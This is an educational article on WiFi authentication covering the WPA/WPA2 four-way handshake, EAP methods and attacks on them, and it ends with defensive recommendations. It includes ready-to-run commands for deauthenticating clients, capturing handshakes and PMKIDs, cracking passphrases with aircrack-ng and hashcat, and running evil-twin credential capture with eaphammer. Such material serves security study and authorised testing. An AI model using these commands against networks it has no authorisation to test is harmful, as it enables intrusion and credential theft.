Authentication Mechanisms and Handshake Analysis

Understanding WiFi Authentication Mechanisms - Security Protocol Analysis and Attack Vectors

What are WiFi Authentication Mechanisms?

Simple Definition: WiFi authentication mechanisms are the security protocols that verify device identity and establish secure communication channels between wireless clients and access points.

Technical Definition: WiFi authentication mechanisms encompass the cryptographic protocols, key exchange processes, and security frameworks used to authenticate wireless devices and establish secure communication channels, including four-way handshake protocols, EAP methods, and key derivation procedures.

WPA/WPA2 Four-Way Handshake Protocol

Handshake Overview and Purpose

Authentication Objective: Establish mutual authentication between client and access point while deriving session-specific encryption keys without transmitting sensitive key material.

Key Derivation Hierarchy:

Passphrase/Master Key
    ↓ (PBKDF2)
Pairwise Master Key (PMK)
    ↓ (PRF-512 with nonces)
Pairwise Transient Key (PTK)
    ↓ (Key components)
├── Key Confirmation Key (KCK) - 128 bits
├── Key Encryption Key (KEK) - 128 bits
└── Temporal Encryption Key (TEK) - 128 bits

Four-Way Handshake Process

Message 1: AP → Client

AP generates ANonce (random number)
Sends: ANonce + Key Information
Purpose: Initiate handshake and provide AP nonce

Message 2: Client → AP

Client generates SNonce (random number)
Derives PTK = PRF-512(PMK, "Pairwise key expansion", 
                     AP_MAC || Client_MAC || ANonce || SNonce)
Sends: SNonce + MIC (Message Integrity Code)
Purpose: Provide client nonce and prove PMK knowledge

Message 3: AP → Client

AP derives PTK using received SNonce
Verifies MIC from Message 2
Sends: GTK (Group Temporal Key) + MIC
Purpose: Confirm authentication and distribute group key

Message 4: Client → AP

Client verifies MIC from Message 3
Installs PTK for unicast encryption
Sends: Confirmation + MIC
Purpose: Confirm successful key installation

Handshake Security Analysis

Cryptographic Strength:

  • PMK derived through PBKDF2 with 4096 iterations
  • PTK derived using PRF-512 with random nonces
  • MIC calculation using HMAC-SHA1 or AES-CMAC
  • Replay protection through sequence numbers

Vulnerability Exposure:

  • Handshake capture enables offline password attacks
  • Weak passwords vulnerable to dictionary/brute force
  • KRACK attacks exploit handshake implementation flaws
  • Deauthentication attacks force handshake repetition

Handshake Capture and Analysis

Monitoring and Capture Techniques

Passive Handshake Capture:

# Monitor wireless interface for handshake capture
airodump-ng -c [channel] --bssid [AP_MAC] -w handshake wlan0

# Wait for natural client authentication or force with deauth
aireplay-ng --deauth 5 -a [AP_MAC] -c [CLIENT_MAC] wlan0

# Verify handshake capture completeness
aircrack-ng handshake-01.cap

Handshake Validation and Analysis:

# Analyze captured handshake with Wireshark
wireshark handshake-01.cap

# Filter for EAPOL frames (handshake messages)
# Display filter: eapol

# Verify presence of all four handshake messages
# Message 1: Key Info = 0x0089 (from AP)
# Message 2: Key Info = 0x010a (from Client, with MIC)
# Message 3: Key Info = 0x13ca (from AP, with MIC and Encrypted)
# Message 4: Key Info = 0x030a (from Client, with MIC)

Advanced Handshake Analysis

PMKID Attack (Clientless Capture):

# Capture PMKID from beacon/probe response frames
hcxdumptool -i wlan0 -o pmkid.pcapng --enable_status=1

# Extract PMKID for offline analysis
hcxpcapngtool -o pmkid.hash pmkid.pcapng

# Crack PMKID using hashcat
hashcat -m 16800 pmkid.hash wordlist.txt

Key Derivation Verification:

  • Analyze nonce generation for randomness
  • Verify MIC calculations for integrity
  • Check key installation timing for KRACK vulnerability
  • Validate replay counter implementation

EAP (Extensible Authentication Protocol) Methods

EAP Framework Architecture

EAP Communication Flow:

Supplicant (Client) ←→ Authenticator (AP) ←→ Authentication Server (RADIUS)

Common EAP Methods:

  • EAP-TLS: Certificate-based mutual authentication
  • EAP-TTLS: Tunneled authentication with server certificates
  • EAP-PEAP: Protected EAP with server-side certificates
  • EAP-FAST: Flexible authentication via secure tunneling

EAP-TLS Implementation

Certificate-Based Authentication:

  1. TLS Handshake: Establish encrypted tunnel using certificates
  2. Certificate Validation: Verify client and server certificates
  3. Key Derivation: Generate session keys from TLS master secret
  4. Success/Failure: Complete authentication based on certificate validity

Security Advantages:

  • Strong mutual authentication through PKI
  • No password transmission over wireless medium
  • Resistance to dictionary and brute force attacks
  • Perfect forward secrecy through ephemeral keys

EAP-PEAP Implementation

Protected Authentication Process:

  1. Server Certificate Verification: Client validates server certificate
  2. TLS Tunnel Establishment: Create encrypted communication channel
  3. Inner Authentication: MSCHAPv2 or other method within tunnel
  4. Key Derivation: Generate keys from tunnel and inner authentication

Common Vulnerabilities:

  • Certificate validation bypass in client implementations
  • Inner method vulnerabilities (MSCHAPv2 weaknesses)
  • Tunnel credential leakage through implementation flaws

Authentication Attack Vectors

Dictionary and Brute Force Attacks

Offline Password Attacks:

# Standard WPA/WPA2 dictionary attack
aircrack-ng -w wordlist.txt handshake.cap

# GPU-accelerated attacks using hashcat
hashcat -m 2500 handshake.hccapx wordlist.txt

# Advanced rule-based attacks
hashcat -m 2500 handshake.hccapx wordlist.txt -r rules/best64.rule

Password Policy Analysis:

  • Common password patterns and variations
  • Date-based and location-based password generation
  • Corporate naming conventions and themes
  • Dictionary mutation rules for targeted attacks

KRACK (Key Reinstallation Attacks)

Vulnerability Mechanism:

  • Force nonce reuse through handshake manipulation
  • Exploit key reinstallation in client implementations
  • Decrypt traffic using known keystream
  • Inject malicious frames into encrypted sessions

KRACK Attack Implementation:

# KRACK attack framework (research/testing only)
./krackattack.py --target [CLIENT_MAC] --ap [AP_MAC]

# Monitor for vulnerable client behavior
# Look for nonce reuse and keystream recovery opportunities

Evil Twin and Rogue AP Attacks

Authentication Bypass Strategy:

  1. Rogue AP Deployment: Create convincing network duplicate
  2. Client Deauthentication: Force disconnection from legitimate AP
  3. Credential Capture: Harvest authentication attempts
  4. Man-in-the-Middle: Position for traffic interception

Advanced Authentication Analysis

Handshake Timing Analysis

Performance Assessment:

  • Authentication latency measurement
  • Handshake completion success rates
  • Roaming authentication efficiency
  • Certificate validation timing

Security Timing Analysis:

  • Nonce generation predictability
  • Key derivation implementation timing
  • Authentication failure response timing
  • Side-channel information leakage

Implementation Vulnerability Analysis

Client Implementation Testing:

# Test client certificate validation
hostapd-eaphammer -i wlan0 --cert-wizard

# Analyze EAP method downgrade susceptibility
eaphammer --interface wlan0 --channel 6 --essid "Target_Network"

Protocol Compliance Testing:

  • 802.1X standard compliance verification
  • EAP method implementation correctness
  • Certificate chain validation testing
  • Authentication state machine analysis

Tools for Authentication Analysis

Handshake Capture and Analysis

Aircrack-ng Suite: Comprehensive handshake capture and analysis toolkit

Hcxtools: Modern WiFi security analysis with PMKID support

Wireshark: Protocol analyzer for detailed handshake examination

Password Recovery and Analysis

Hashcat: Advanced password recovery with GPU acceleration

John the Ripper: Versatile password cracking tool with WPA support

Pyrit: GPU-accelerated WPA/WPA2 cracking framework

EAP and Enterprise Analysis

FreeRADIUS-WPE: RADIUS server for EAP credential capture

EAPHammer: Targeted evil twin attacks against enterprise networks

Hostapd-WPE: Access point with EAP credential logging

Professional Implementation

Security Assessment Methodology

Authentication Security Testing:

  1. Handshake Capture: Collect authentication exchanges for analysis
  2. Password Strength Assessment: Evaluate passphrase security
  3. Implementation Testing: Verify protocol compliance and security
  4. Vulnerability Scanning: Test for known authentication flaws

Defensive Recommendations

Strong Authentication Implementation:

  • Deploy complex, lengthy passwords resistant to dictionary attacks
  • Implement certificate-based authentication where feasible
  • Enable Protected Management Frames (PMF) for enhanced security
  • Monitor authentication patterns for anomaly detection

Enterprise Security Measures:

  • Deploy robust certificate validation in EAP implementations
  • Use mutual authentication methods like EAP-TLS
  • Implement network access control beyond initial authentication
  • Deploy wireless intrusion detection for authentication monitoring

Authentication Mechanisms and Handshake Analysis provide critical understanding of WiFi security protocols, enabling comprehensive assessment of authentication implementations while demonstrating both the strengths and vulnerabilities inherent in wireless authentication systems.